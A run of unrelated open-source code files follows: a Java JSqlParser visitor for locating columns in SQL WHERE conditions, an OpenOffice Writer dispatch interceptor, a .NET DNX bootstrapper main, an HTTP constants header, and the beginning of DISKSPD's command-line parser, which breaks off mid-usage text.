final Pattern valuePattern; final String sql; Pair<Integer, Integer> result; final StringBuilder left = new StringBuilder(); public PExpressionVisitorAdapter(Pattern exprPattern, String sql) { this.exprPattern = exprPattern; this.sql = sql; valuePattern = Pattern.compile(WhereConditionEditorPanel.VALUE_REGEX, Pattern.CASE_INSENSITIVE|Pattern.DOTALL); } @Override public void visit(NotExpression aThis) { check(aThis); visitAny(aThis); } @Override public void visit(NotEqualsTo notEqualsTo) { check(notEqualsTo); visitAny(notEqualsTo); } @Override public void visit(MinorThanEquals minorThanEquals) { check(minorThanEquals); visitAny(minorThanEquals); } @Override public void visit(MinorThan minorThan) { check(minorThan); visitAny(minorThan); } @Override public void visit(LikeExpression likeExpression) { check(likeExpression); visitAny(likeExpression); } @Override public void visit(IsNullExpression isNullExpression) { check(isNullExpression); check(isNullExpression.getLeftExpression()); visitAny(isNullExpression); } @Override public void visit(GreaterThanEquals greaterThanEquals) { check(greaterThanEquals); visitAny(greaterThanEquals); } @Override public void visit(GreaterThan greaterThan) { check(greaterThan); visitAny(greaterThan); } @Override public void visit(EqualsTo equalsTo) { check(equalsTo); visitAny(equalsTo); } @Override public void visit(XorExpression orExpression) { check(orExpression); visitAny(orExpression); } @Override public void visit(OrExpression orExpression) { check(orExpression); visitAny(orExpression); } @Override public void visit(AndExpression andExpression) { check(andExpression); andExpression.getLeftExpression().accept(this); andExpression.getRightExpression().accept(this); } @Override public void visit(Parenthesis parenthesis) { check(parenthesis); parenthesis.getExpression().accept(this); } private void check(Object node) { if (result == null) { Matcher matcher = exprPattern.matcher(node.toString()); if (matcher.matches()) { int cnt = 1; matcher = exprPattern.matcher(left); while (matcher.find()) { ++cnt; } result = new Pair<Integer, Integer>(cnt, left.length()); } if (node instanceof ComparisonOperator) { Expression rightExpression = ((ComparisonOperator) node).getRightExpression(); if (rightExpression != null && !valuePattern.matcher(rightExpression.toString()).matches()) { invalidComparisons.add(node); result = null; } else { check(((ComparisonOperator) node).getLeftExpression()); } } else if (node instanceof LikeExpression) { Expression rightExpression = ((LikeExpression) node).getRightExpression(); if (rightExpression != null && !valuePattern.matcher(rightExpression.toString()).matches()) { invalidComparisons.add(node); result = null; } else { check(((LikeExpression) node).getLeftExpression()); } } } } private Set<Object> invalidComparisons = new HashSet<Object>(); private void visitAny(Object o) { if (invalidComparisons.contains(o)) { left.append("1=1"); } else if (!(o instanceof LikeExpression) && (o instanceof ASTNodeAccess && ((ASTNodeAccess) o).getASTNode() != null)) { SimpleNode node = ((ASTNodeAccess) o).getASTNode(); try { left.append(sql.substring(node.jjtGetFirstToken().absoluteBegin - 1, node.jjtGetLastToken().absoluteEnd - 1)); } catch (Exception e) { left.append(o.toString()); } } else { left.append(o.toString()); } left.append(" "); } @Override public void visit(BitwiseRightShift aThis) { visitAny(aThis); } @Override public void visit(BitwiseLeftShift aThis) { visitAny(aThis); } @Override public void visit(NullValue nullValue) { visitAny(nullValue); } @Override public void visit(Function function) { visitAny(function); } @Override public void visit(SignedExpression signedExpression) { visitAny(signedExpression); } @Override public void visit(JdbcParameter jdbcParameter) { visitAny(jdbcParameter); } @Override public void visit(JdbcNamedParameter jdbcNamedParameter) { visitAny(jdbcNamedParameter); } @Override public void visit(DoubleValue doubleValue) { visitAny(doubleValue); } @Override public void visit(LongValue longValue) { visitAny(longValue); } @Override public void visit(HexValue hexValue) { visitAny(hexValue); } @Override public void visit(DateValue dateValue) { visitAny(dateValue); } @Override public void visit(TimeValue timeValue) { visitAny(timeValue); } @Override public void visit(TimestampValue timestampValue) { visitAny(timestampValue); } @Override public void visit(StringValue stringValue) { visitAny(stringValue); } @Override public void visit(Addition addition) { visitAny(addition); } @Override public void visit(Division division) { visitAny(division); } @Override public void visit(IntegerDivision division) { visitAny(division); } @Override public void visit(Multiplication multiplication) { visitAny(multiplication); } @Override public void visit(Subtraction subtraction) { visitAny(subtraction); } @Override public void visit(Between between) { visitAny(between); } @Override public void visit(InExpression inExpression) { visitAny(inExpression); } @Override public void visit(FullTextSearch fullTextSearch) { visitAny(fullTextSearch); } @Override public void visit(IsBooleanExpression isBooleanExpression) { visitAny(isBooleanExpression); } @Override public void visit(Column tableColumn) { visitAny(tableColumn); } @Override public void visit(SubSelect subSelect) { visitAny(subSelect); } @Override public void visit(CaseExpression caseExpression) { visitAny(caseExpression); } @Override public void visit(WhenClause whenClause) { visitAny(whenClause); } @Override public void visit(ExistsExpression existsExpression) { visitAny(existsExpression); } @Override public void visit(AnyComparisonExpression anyComparisonExpression) { visitAny(anyComparisonExpression); } @Override public void visit(Concat concat) { visitAny(concat); } @Override public void visit(Matches matches) { visitAny(matches); } @Override public void visit(BitwiseAnd bitwiseAnd) { visitAny(bitwiseAnd); } @Override public void visit(BitwiseOr bitwiseOr) { visitAny(bitwiseOr); } @Override public void visit(BitwiseXor bitwiseXor) { visitAny(bitwiseXor); } @Override public void visit(CastExpression cast) { visitAny(cast); } @Override public void visit(Modulo modulo) { visitAny(modulo); } @Override public void visit(AnalyticExpression aexpr) { visitAny(aexpr); } @Override public void visit(ExtractExpression eexpr) { visitAny(eexpr); } @Override public void visit(IntervalExpression iexpr) { visitAny(iexpr); } @Override public void visit(OracleHierarchicalExpression oexpr) { visitAny(oexpr); } @Override public void visit(RegExpMatchOperator rexpr) { visitAny(rexpr); } @Override public void visit(JsonExpression jsonExpr) { visitAny(jsonExpr); } @Override public void visit(JsonOperator jsonExpr) { visitAny(jsonExpr); } @Override public void visit(RegExpMySQLOperator regExpMySQLOperator) { visitAny(regExpMySQLOperator); } @Override public void visit(UserVariable var) { visitAny(var); } @Override public void visit(NumericBind bind) { visitAny(bind); } @Override public void visit(KeepExpression aexpr) { visitAny(aexpr); } @Override public void visit(MySQLGroupConcat groupConcat) { visitAny(groupConcat); } @Override public void visit(ValueListExpression valueList) { visitAny(valueList); } @Override public void visit(RowConstructor rowConstructor) { visitAny(rowConstructor); } @Override public void visit(RowGetExpression rowGetExpression) { visitAny(rowGetExpression); } @Override public void visit(OracleHint hint) { visitAny(hint); } @Override public void visit(TimeKeyExpression timeKeyExpression) { visitAny(timeKeyExpression); } @Override public void visit(DateTimeLiteralExpression literal) { visitAny(literal); } @Override public void visit(NextValExpression aThis) { visitAny(aThis); } @Override public void visit(CollateExpression aThis) { visitAny(aThis); } @Override public void visit(SimilarToExpression aThis) { visitAny(aThis); } @Override public void visit(ArrayExpression aThis) { visitAny(aThis); } @Override public void visit(ArrayConstructor aThis) { visitAny(aThis); } @Override public void visit(VariableAssignment aThis) { visitAny(aThis); } @Override public void visit(XMLSerializeExpr aThis) { visitAny(aThis); } @Override public void visit(TimezoneExpression aThis) { visitAny(aThis); } @Override public void visit(JsonAggregateFunction aThis) { visitAny(aThis); } @Override public void visit(JsonFunction aThis) { visitAny(aThis); } @Override public void visit(ConnectByRootOperator aThis) { visitAny(aThis); } @Override public void visit(OracleNamedFunctionParameter aThis) { visitAny(aThis); } }; public static Pair<Integer, Integer> getPositivePosition(String expr, Set<String> alternativeNames, String condition) { if (expr == null) { return null; } String pattern; if (alternativeNames == null) { pattern = SqlUtil.createSQLFragmentSearchPattern(expr, false); } else { pattern = "(?:" + alternativeNames.stream().map(aName -> "(?:" + SqlUtil.createSQLFragmentSearchPattern(aName, false) + ")").collect(Collectors.joining("|")) + ")"; } Pattern pat = Pattern.compile(pattern, Pattern.CASE_INSENSITIVE|Pattern.DOTALL); return getPositivePosition(pat, condition); } public static Pair<Integer, Integer> getPositivePosition(Pattern exprPattern, String condition) { if (condition.isEmpty()) { return null; } net.sf.jsqlparser.statement.Statement st; try { String sql = "Select * From T Where " + condition; st = JSqlParserUtil.parse(sql, 2); PExpressionVisitorAdapter pe = new PExpressionVisitorAdapter(exprPattern, sql); st.accept(new StatementVisitorAdapter() { @Override public void visit(Select select) { select.getSelectBody().accept(new SelectVisitorAdapter() { @Override public void visit(PlainSelect plainSelect) { plainSelect.getWhere().accept(pe); } }); } }); if (pe.result == null) { Matcher matcher = exprPattern.matcher(condition); if (matcher.find()) { pe.result = new Pair<Integer, Integer>(0, 0); } } return pe.result; } catch (/*JSQLParser*/ Exception e) { return null; } } public static boolean isPositiveExpression(String condition) { if (condition.isEmpty()) { return true; } net.sf.jsqlparser.statement.Statement st; try { st = JSqlParserUtil.parse("Select * From T Where " + condition, 2); List<Boolean> result = new ArrayList<>(); st.accept(new StatementVisitorAdapter() { @Override public void visit(Select select) { select.getSelectBody().accept(new SelectVisitorAdapter() { @Override public void visit(PlainSelect plainSelect) { Expression wc = plainSelect.getWhere(); result.add(!( wc instanceof OrExpression || wc instanceof XorExpression)); } }); } }); if (!result.isEmpty()) { return result.get(0); } return false; } catch (/*JSQLParser*/ Exception e) { return false; } } private static boolean warned = false; public static void main(String args[]) { System.out.println(getPositivePosition("A.rzMandant", null, "A.ObjectId = 'dcc9802:1211af96d82:-7d45'\r\n" + " and A . rzMandant = 'ABIT'")); System.out.println(getPositivePosition("rzMandant", null, "A.ObjectId = 'dcc9802:1211af96d82:-7d45'\r\n" + " and A.rzMandant = 'ABIT'")); System.out.println(getPositivePosition("comm", null, "comm=1 or Empno=7902 and deptno=7902 and (comm is not null and boss is null)")); System.out.println(getPositivePosition("(x + 1)", null, "x+1=0")); System.out.println(getPositivePosition("x", null, "not x is not null and x=0")); System.out.println(getPositivePosition("x", null, "x=0")); System.out.println(getPositivePosition("x", null, "not x=0")); System.out.println(getPositivePosition("x", null, "x is null")); System.out.println(getPositivePosition("(x + 1)", null, "x+1=0 or y=0")); System.out.println(getPositivePosition("x", null, "y=0")); System.out.println(getPositivePosition("x", null, "(x=0) and (not 2 * x = 0)")); System.out.println(getPositivePosition("x", null, "(x=0) or (not 2 * x = 0)")); } }
22,253
679
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ // MARKER(update_precomp.py): autogen include statement, do not remove #include "precompiled_sw.hxx" #include <vcl/svapp.hxx> #include <sfx2/viewfrm.hxx> #include <sfx2/dispatch.hxx> #include <svx/dataaccessdescriptor.hxx> #include <unodispatch.hxx> #include <unobaseclass.hxx> #include <view.hxx> #include <cmdid.h> #include "wrtsh.hxx" #include "dbmgr.hxx" using namespace ::com::sun::star; using namespace rtl; using namespace vos; const char* cURLStart = ".uno:DataSourceBrowser/"; const char* cURLFormLetter = ".uno:DataSourceBrowser/FormLetter"; const char* cURLInsertContent = ".uno:DataSourceBrowser/InsertContent";//data into fields const char* cURLInsertColumns = ".uno:DataSourceBrowser/InsertColumns";//data into text const char* cURLDocumentDataSource = ".uno:DataSourceBrowser/DocumentDataSource";//current data source of the document const sal_Char* cInternalDBChangeNotification = ".uno::Writer/DataSourceChanged"; /*-- 07.11.00 13:25:51--------------------------------------------------- -----------------------------------------------------------------------*/ SwXDispatchProviderInterceptor::SwXDispatchProviderInterceptor(SwView& rVw) : m_pView(&rVw) { uno::Reference< frame::XFrame> xUnoFrame = m_pView->GetViewFrame()->GetFrame().GetFrameInterface(); m_xIntercepted = uno::Reference< frame::XDispatchProviderInterception>(xUnoFrame, uno::UNO_QUERY); if(m_xIntercepted.is()) { m_refCount++; m_xIntercepted->registerDispatchProviderInterceptor((frame::XDispatchProviderInterceptor*)this); // this should make us the top-level dispatch-provider for the component, via a call to our // setDispatchProvider we should have got an fallback for requests we (i.e. our master) cannot fulfill uno::Reference< lang::XComponent> xInterceptedComponent(m_xIntercepted, uno::UNO_QUERY); if (xInterceptedComponent.is()) xInterceptedComponent->addEventListener((lang::XEventListener*)this); m_refCount--; } } /*-- 07.11.00 13:25:51--------------------------------------------------- -----------------------------------------------------------------------*/ SwXDispatchProviderInterceptor::~SwXDispatchProviderInterceptor() { } /*-- 07.11.00 13:25:51--------------------------------------------------- -----------------------------------------------------------------------*/ uno::Reference< frame::XDispatch > SwXDispatchProviderInterceptor::queryDispatch( const util::URL& aURL, const OUString& aTargetFrameName, sal_Int32 nSearchFlags ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); uno::Reference< frame::XDispatch> xResult; // create some dispatch ... if(m_pView && !aURL.Complete.compareToAscii(cURLStart, 23)) { if(!aURL.Complete.compareToAscii(cURLFormLetter) || !aURL.Complete.compareToAscii(cURLInsertContent) || !aURL.Complete.compareToAscii(cURLInsertColumns)|| !aURL.Complete.compareToAscii(cURLDocumentDataSource)) { if(!m_xDispatch.is()) m_xDispatch = new SwXDispatch(*m_pView); xResult = m_xDispatch; } } // ask our slave provider if (!xResult.is() && m_xSlaveDispatcher.is()) xResult = m_xSlaveDispatcher->queryDispatch(aURL, aTargetFrameName, nSearchFlags); return xResult; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ uno::Sequence< uno::Reference< frame::XDispatch > > SwXDispatchProviderInterceptor::queryDispatches( const uno::Sequence< frame::DispatchDescriptor >& aDescripts ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); uno::Sequence< uno::Reference< frame::XDispatch> > aReturn(aDescripts.getLength()); uno::Reference< frame::XDispatch>* pReturn = aReturn.getArray(); const frame::DispatchDescriptor* pDescripts = aDescripts.getConstArray(); for (sal_Int16 i=0; i<aDescripts.getLength(); ++i, ++pReturn, ++pDescripts) { *pReturn = queryDispatch(pDescripts->FeatureURL, pDescripts->FrameName, pDescripts->SearchFlags); } return aReturn; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ uno::Reference< frame::XDispatchProvider > SwXDispatchProviderInterceptor::getSlaveDispatchProvider( ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); return m_xSlaveDispatcher; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatchProviderInterceptor::setSlaveDispatchProvider( const uno::Reference< frame::XDispatchProvider >& xNewDispatchProvider ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); m_xSlaveDispatcher = xNewDispatchProvider; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ uno::Reference< frame::XDispatchProvider > SwXDispatchProviderInterceptor::getMasterDispatchProvider( ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); return m_xMasterDispatcher; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatchProviderInterceptor::setMasterDispatchProvider( const uno::Reference< frame::XDispatchProvider >& xNewSupplier ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); m_xMasterDispatcher = xNewSupplier; } /*-- 07.11.00 13:25:53--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatchProviderInterceptor::disposing( const lang::EventObject& ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); if (m_xIntercepted.is()) { m_xIntercepted->releaseDispatchProviderInterceptor((frame::XDispatchProviderInterceptor*)this); uno::Reference< lang::XComponent> xInterceptedComponent(m_xIntercepted, uno::UNO_QUERY); if (xInterceptedComponent.is()) xInterceptedComponent->removeEventListener((lang::XEventListener*)this); m_xDispatch = 0; } m_xIntercepted = NULL; } /* -----------------------------01.10.2001 14:31------------------------------ ---------------------------------------------------------------------------*/ const uno::Sequence< sal_Int8 > & SwXDispatchProviderInterceptor::getUnoTunnelId() { static uno::Sequence< sal_Int8 > aSeq = ::CreateUnoTunnelId(); return aSeq; } /* -----------------------------01.10.2001 14:31------------------------------ ---------------------------------------------------------------------------*/ sal_Int64 SwXDispatchProviderInterceptor::getSomething( const uno::Sequence< sal_Int8 >& aIdentifier ) throw(uno::RuntimeException) { if( aIdentifier.getLength() == 16 && 0 == rtl_compareMemory( getUnoTunnelId().getConstArray(), aIdentifier.getConstArray(), 16 ) ) { return sal::static_int_cast< sal_Int64 >( reinterpret_cast< sal_IntPtr >( this )); } return 0; } /* -----------------------------01.10.2001 14:32------------------------------ ---------------------------------------------------------------------------*/ void SwXDispatchProviderInterceptor::Invalidate() { DispatchMutexLock_Impl aLock(*this); if (m_xIntercepted.is()) { m_xIntercepted->releaseDispatchProviderInterceptor((frame::XDispatchProviderInterceptor*)this); uno::Reference< lang::XComponent> xInterceptedComponent(m_xIntercepted, uno::UNO_QUERY); if (xInterceptedComponent.is()) xInterceptedComponent->removeEventListener((lang::XEventListener*)this); m_xDispatch = 0; } m_xIntercepted = NULL; m_pView = 0; } /* -----------------------------07.11.00 14:26-------------------------------- ---------------------------------------------------------------------------*/ SwXDispatch::SwXDispatch(SwView& rVw) : m_pView(&rVw), m_bOldEnable(sal_False), m_bListenerAdded(sal_False) { } /*-- 07.11.00 14:26:13--------------------------------------------------- -----------------------------------------------------------------------*/ SwXDispatch::~SwXDispatch() { if(m_bListenerAdded && m_pView) { uno::Reference<view::XSelectionSupplier> xSupplier = m_pView->GetUNOObject(); uno::Reference<view::XSelectionChangeListener> xThis = this; xSupplier->removeSelectionChangeListener(xThis); } } /*-- 07.11.00 14:26:13--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatch::dispatch( const util::URL& aURL, const uno::Sequence< beans::PropertyValue >& aArgs ) throw(uno::RuntimeException) { if(!m_pView) throw uno::RuntimeException(); SwWrtShell& rSh = m_pView->GetWrtShell(); SwNewDBMgr* pNewDBMgr = rSh.GetNewDBMgr(); if(!aURL.Complete.compareToAscii(cURLInsertContent)) { ::svx::ODataAccessDescriptor aDescriptor(aArgs); SwMergeDescriptor aMergeDesc( DBMGR_MERGE, rSh, aDescriptor ); pNewDBMgr->MergeNew(aMergeDesc); } else if(!aURL.Complete.compareToAscii(cURLInsertColumns)) { pNewDBMgr->InsertText(rSh, aArgs); } else if(!aURL.Complete.compareToAscii(cURLFormLetter)) { SfxUsrAnyItem aDBProperties(FN_PARAM_DATABASE_PROPERTIES, uno::makeAny(aArgs)); m_pView->GetViewFrame()->GetDispatcher()->Execute( FN_MAILMERGE_WIZARD, SFX_CALLMODE_ASYNCHRON, &aDBProperties, 0L); // pNewDBMgr->ExecuteFormLetter(rSh, aArgs); } else if(!aURL.Complete.compareToAscii(cURLDocumentDataSource)) { OSL_ENSURE(sal_False, "SwXDispatch::dispatch: this URL is not to be dispatched!"); } else if(!aURL.Complete.compareToAscii(cInternalDBChangeNotification)) { frame::FeatureStateEvent aEvent; aEvent.IsEnabled = sal_True; aEvent.Source = *(cppu::OWeakObject*)this; const SwDBData& rData = m_pView->GetWrtShell().GetDBDesc(); ::svx::ODataAccessDescriptor aDescriptor; aDescriptor.setDataSource(rData.sDataSource); aDescriptor[::svx::daCommand] <<= rData.sCommand; aDescriptor[::svx::daCommandType] <<= rData.nCommandType; aEvent.State <<= aDescriptor.createPropertyValueSequence(); aEvent.IsEnabled = rData.sDataSource.getLength() > 0; StatusListenerList::iterator aListIter = m_aListenerList.begin(); for(aListIter = m_aListenerList.begin(); aListIter != m_aListenerList.end(); ++aListIter) { StatusStruct_Impl aStatus = *aListIter; if(!aStatus.aURL.Complete.compareToAscii(cURLDocumentDataSource)) { aEvent.FeatureURL = aStatus.aURL; aStatus.xListener->statusChanged( aEvent ); } } } else throw uno::RuntimeException(); } /*-- 07.11.00 14:26:13--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatch::addStatusListener( const uno::Reference< frame::XStatusListener >& xControl, const util::URL& aURL ) throw(uno::RuntimeException) { if(!m_pView) throw uno::RuntimeException(); ShellModes eMode = m_pView->GetShellMode(); sal_Bool bEnable = SHELL_MODE_TEXT == eMode || SHELL_MODE_LIST_TEXT == eMode || SHELL_MODE_TABLE_TEXT == eMode || SHELL_MODE_TABLE_LIST_TEXT == eMode; m_bOldEnable = bEnable; frame::FeatureStateEvent aEvent; aEvent.IsEnabled = bEnable; aEvent.Source = *(cppu::OWeakObject*)this; aEvent.FeatureURL = aURL; // one of the URLs requires a special state .... if (!aURL.Complete.compareToAscii(cURLDocumentDataSource)) { const SwDBData& rData = m_pView->GetWrtShell().GetDBDesc(); ::svx::ODataAccessDescriptor aDescriptor; aDescriptor.setDataSource(rData.sDataSource); aDescriptor[::svx::daCommand] <<= rData.sCommand; aDescriptor[::svx::daCommandType] <<= rData.nCommandType; aEvent.State <<= aDescriptor.createPropertyValueSequence(); aEvent.IsEnabled = rData.sDataSource.getLength() > 0; } xControl->statusChanged( aEvent ); StatusListenerList::iterator aListIter = m_aListenerList.begin(); StatusStruct_Impl aStatus; aStatus.xListener = xControl; aStatus.aURL = aURL; m_aListenerList.insert(aListIter, aStatus); if(!m_bListenerAdded) { uno::Reference<view::XSelectionSupplier> xSupplier = m_pView->GetUNOObject(); uno::Reference<view::XSelectionChangeListener> xThis = this; xSupplier->addSelectionChangeListener(xThis); m_bListenerAdded = sal_True; } } /*-- 07.11.00 14:26:15--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatch::removeStatusListener( const uno::Reference< frame::XStatusListener >& xControl, const util::URL& ) throw(uno::RuntimeException) { StatusListenerList::iterator aListIter = m_aListenerList.begin(); for(aListIter = m_aListenerList.begin(); aListIter != m_aListenerList.end(); ++aListIter) { StatusStruct_Impl aStatus = *aListIter; if(aStatus.xListener.get() == xControl.get()) { m_aListenerList.erase(aListIter); break; } } if(m_aListenerList.empty() && m_pView) { uno::Reference<view::XSelectionSupplier> xSupplier = m_pView->GetUNOObject(); uno::Reference<view::XSelectionChangeListener> xThis = this; xSupplier->removeSelectionChangeListener(xThis); m_bListenerAdded = sal_False; } } /* -----------------------------07.03.01 10:27-------------------------------- ---------------------------------------------------------------------------*/ void SwXDispatch::selectionChanged( const lang::EventObject& ) throw(uno::RuntimeException) { ShellModes eMode = m_pView->GetShellMode(); sal_Bool bEnable = SHELL_MODE_TEXT == eMode || SHELL_MODE_LIST_TEXT == eMode || SHELL_MODE_TABLE_TEXT == eMode || SHELL_MODE_TABLE_LIST_TEXT == eMode; if(bEnable != m_bOldEnable) { m_bOldEnable = bEnable; frame::FeatureStateEvent aEvent; aEvent.IsEnabled = bEnable; aEvent.Source = *(cppu::OWeakObject*)this; StatusListenerList::iterator aListIter = m_aListenerList.begin(); for(aListIter = m_aListenerList.begin(); aListIter != m_aListenerList.end(); ++aListIter) { StatusStruct_Impl aStatus = *aListIter; aEvent.FeatureURL = aStatus.aURL; if (0 != aStatus.aURL.Complete.compareToAscii(cURLDocumentDataSource)) // the document's data source does not depend on the selection, so it's state does not change here aStatus.xListener->statusChanged( aEvent ); } } } /* -----------------------------07.03.01 10:46-------------------------------- ---------------------------------------------------------------------------*/ void SwXDispatch::disposing( const lang::EventObject& rSource ) throw(uno::RuntimeException) { uno::Reference<view::XSelectionSupplier> xSupplier(rSource.Source, uno::UNO_QUERY); uno::Reference<view::XSelectionChangeListener> xThis = this; xSupplier->removeSelectionChangeListener(xThis); m_bListenerAdded = sal_False; lang::EventObject aObject; aObject.Source = (cppu::OWeakObject*)this; StatusListenerList::iterator aListIter = m_aListenerList.begin(); for(; aListIter != m_aListenerList.end(); ++aListIter) { StatusStruct_Impl aStatus = *aListIter; aStatus.xListener->disposing(aObject); } m_pView = 0; } /* -----------------------------12.07.01 13:30-------------------------------- ---------------------------------------------------------------------------*/ const sal_Char* SwXDispatch::GetDBChangeURL() { return cInternalDBChangeNotification; } /* -----------------------------09.09.2002 08:48------------------------------ ---------------------------------------------------------------------------*/ SwXDispatchProviderInterceptor::DispatchMutexLock_Impl::DispatchMutexLock_Impl( SwXDispatchProviderInterceptor& ) : // aGuard(rInterceptor.m_aMutex) #102295# solar mutex has to be used currently aGuard(Application::GetSolarMutex()) { } /* -----------------------------09.09.2002 08:48------------------------------ ---------------------------------------------------------------------------*/ SwXDispatchProviderInterceptor::DispatchMutexLock_Impl::~DispatchMutexLock_Impl() { }
6,122
798
// Copyright (c) .NET Foundation. All rights reserved. // Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information. #include "stdafx.h" #include "pal.h" #include "utils.h" int CallApplicationProcessMain(int argc, dnx::char_t* argv[], dnx::trace_writer& trace_writer); void FreeExpandedCommandLineArguments(size_t argc, dnx::char_t** ppszArgv); bool ExpandCommandLineArguments(int argc, dnx::char_t** ppszArgv, size_t& expanded_argc, dnx::char_t**& ppszExpandedArgv); #if defined(ARM) int wmain(int argc, wchar_t* argv[]) #elif defined(PLATFORM_UNIX) int main(int argc, char* argv[]) #else extern "C" int __stdcall DnxMain(int argc, wchar_t* argv[]) #endif { // Check for the debug flag before doing anything else dnx::utils::wait_for_debugger(argc - 1, const_cast<const dnx::char_t**>(&(argv[1])), _X("--bootstrapper-debug")); size_t nExpandedArgc = 0; dnx::char_t** ppszExpandedArgv = nullptr; auto expanded = ExpandCommandLineArguments(argc - 1, &(argv[1]), nExpandedArgc, ppszExpandedArgv); auto trace_writer = dnx::trace_writer{ IsTracingEnabled() }; if (!expanded) { return CallApplicationProcessMain(argc - 1, &argv[1], trace_writer); } auto exitCode = CallApplicationProcessMain(static_cast<int>(nExpandedArgc), ppszExpandedArgv, trace_writer); FreeExpandedCommandLineArguments(nExpandedArgc, ppszExpandedArgv); return exitCode; }
563
368
/** * @file http_global.h * @brief Http全局数据定义 * @author xiangwangfeng <<EMAIL>> * @data 2011-4-24 * @website www.xiangwangfeng.com */ #pragma once #include "global_defs.h" const char kget[] = "GET"; const char kpost[] = "POST"; const char kaccept[] = "Accept"; const char kconnection[] = "Connection"; const char kcontent_type[] = "Content-Type"; const char kcontent_length[] = "Content-Length"; NAMESPACE_BEGIN(Http) //Http传输错误码 enum HTTPERROR { HTTPERROR_SUCCESS, //正确 HTTPERROR_INVALID, //HTTP已经被弃用 HTTPERROR_CONNECT, //连接出错 HTTPERROR_TRANSPORT, //传输失败 HTTPERROR_IO, //IO错误 HTTPERROR_PARAMETER //无效参数 }; NAMESPACE_END(Http)
370
430
/* DISKSPD Copyright(c) Microsoft Corporation All rights reserved. MIT License Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ #include "CmdLineParser.h" #include "Common.h" #include "XmlProfileParser.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> CmdLineParser::CmdLineParser() : _dwBlockSize(64 * 1024), _ulWriteRatio(0), _hEventStarted(nullptr), _hEventFinished(nullptr) { } CmdLineParser::~CmdLineParser() { } // Get size in bytes from a string (KMGTb) bool CmdLineParser::_GetSizeInBytes(const char *pszSize, UINT64& ullSize, const char **pszRest) const { bool fOk = true; UINT64 ullResult = 0; UINT64 ullMultiplier = 1; const char *rest = nullptr; fOk = Util::ParseUInt(pszSize, ullResult, rest); if (fOk) { char ch = static_cast<char>(toupper(*rest)); switch (ch) { case '\0': { break; } case 'T': { ullMultiplier *= 1024; } case 'G': { ullMultiplier *= 1024; } case 'M': { ullMultiplier *= 1024; } case 'K': { ullMultiplier *= 1024; ++rest; break; } case 'B': { ullMultiplier = _dwBlockSize; ++rest; break; } default: { // // If caller is not expecting continuation, we know this is malformed now and // can say so with respect to size specifiers. // If there is continuation, caller is responsible for validating. // if (!pszRest) { fOk = false; fprintf(stderr, "Invalid size '%c'. Valid: K - KiB, M - MiB, G - GiB, T - TiB, B - block\n", *rest); } } } if (fOk) { // // Second chance after parsing valid size qualifier. // if (!pszRest && *rest != '\0') { fOk = false; fprintf(stderr, "Unrecognized characters after size specification\n"); } // // Now apply size specifier. // else if (ullResult <= MAXUINT64 / ullMultiplier) { ullResult *= ullMultiplier; } else { // overflow fOk = false; fprintf(stderr, "Overflow applying multipler '%c'\n", ch); } } } else { fprintf(stderr, "Invalid integer\n"); } if (fOk) { ullSize = ullResult; if (pszRest) { *pszRest = rest; } } return fOk; } bool CmdLineParser::_GetRandomDataWriteBufferData(const string& sArg, UINT64& cb, string& sPath) { bool fOk = true; size_t iComma = sArg.find(','); if (iComma == sArg.npos) { fOk = _GetSizeInBytes(sArg.c_str(), cb, nullptr); sPath = ""; } else { fOk = _GetSizeInBytes(sArg.substr(0, iComma).c_str(), cb, nullptr); sPath = sArg.substr(iComma + 1); } return fOk; } void CmdLineParser::_DisplayUsageInfo(const char *pszFilename) const { // ISSUE-REVIEW: this formats badly in the default 80 column command prompt printf("\n"); printf("Usage: %s [options] target1 [ target2 [ target3 ...] ]\n", pszFilename); printf("version %s (%s)\n", DISKSPD_NUMERIC_VERSION_STRING, DISKSPD_DATE_VERSION_STRING); printf("\n"); printf( "Valid targets:\n" " file_path\n" " #<physical drive number>\n" " <drive_letter>:\n" "\n" "Available options:\n" " -? display usage information\n" " -ag group affinity - affinitize threads round-robin to cores in Processor Groups 0 - n.\n" " Group 0 is filled before Group 1, and so forth.\n" " [default; use 